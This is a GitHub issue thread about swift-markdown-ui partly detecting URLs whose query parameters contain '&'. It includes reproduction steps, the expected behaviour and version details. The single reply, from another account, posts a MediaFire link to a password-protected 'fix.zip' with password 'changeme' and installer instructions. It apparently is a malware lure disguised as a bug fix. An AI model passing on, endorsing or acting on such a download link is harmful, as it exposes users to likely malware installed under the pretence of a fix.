### ISSUE TITLE
Url is not supported with Query param after &

### ISSUE THREAD

**Issue by mujahid01ali** [gonzalezreal/swift-markdown-ui#346]
A link with query param is not detecting like "https://example1.com/faq.html?tag=abc&newtag=bcd" in the text but it is working if using with heading(#) tags.

**Describe the bug**

**Checklist**
- [x] I can reproduce this issue with a SwiftUI project.
- [x] I can reproduce this issue using the `main` branch of this package.
- [x] This bug hasn't been addressed in an [existing GitHub issue](https://github.com/gonzalezreal/swift-markdown-ui/issues).

**Steps to reproduce**
1. Add a url with query params (i.e https://example1.com/faq.html?tag=abc&newtag=bcd). You will see that url is partially detected in markdown UI view.

**Expected behavior**
- Complete url(https://example1.com/faq.html?tag=abc&newtag=bcd) should be detected as link.

**Screenshots**
<img width="437" alt="image" src="https://github.com/user-attachments/assets/7becea5e-296d-4a06-8d32-fc56b37872b7">

**Version information**
- MarkdownUI: 2.4.0
- OS: macOS 13
- Xcode: 15.4

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
